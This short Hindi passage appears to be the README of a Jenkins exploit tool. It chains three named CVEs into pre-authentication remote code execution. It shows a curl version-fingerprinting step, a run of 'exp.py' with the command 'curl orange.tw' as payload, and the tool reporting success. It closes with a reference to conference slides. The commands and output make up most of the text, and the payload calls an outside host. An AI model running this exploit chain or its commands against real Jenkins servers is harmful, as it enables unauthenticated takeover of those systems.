
मई 2017 से Jenkins में कोई pre-auth RCE नहीं है, लेकिन यह वही है!
मई 2017 से Jenkins में कोई pre-auth RCE नहीं है, लेकिन यह वही है!
यह CVE-2018-1000861, CVE-2019-1003005 और CVE-2019-1003029 को जोड़कर एक अधिक विश्वसनीय और सुरुचिपूर्ण pre-auth रिमोट कोड निष्पादन बनाता है!
ANONYMOUS_READ अक्षम
ANONYMOUS_READ सक्षम(या सामान्य उपयोगकर्ता खाते के साथ)
$ curl -s -I http://jenkins/| grep X-Jenkins
X-Jenkins: 2.137
X-Jenkins-Session: 20f72c2e
X-Jenkins-CLI-Port: 50000
X-Jenkins-CLI2-Port: 50000
$ python exp.py http://jenkins/ 'curl orange.tw'
[*] ANONYMOUS_READ disable!
[*] Bypass with CVE-2018-1000861!
[*] Exploit success!(it should be :P)
मेरी HITB AMS 2019 टॉक की कुछ स्लाइड्स:
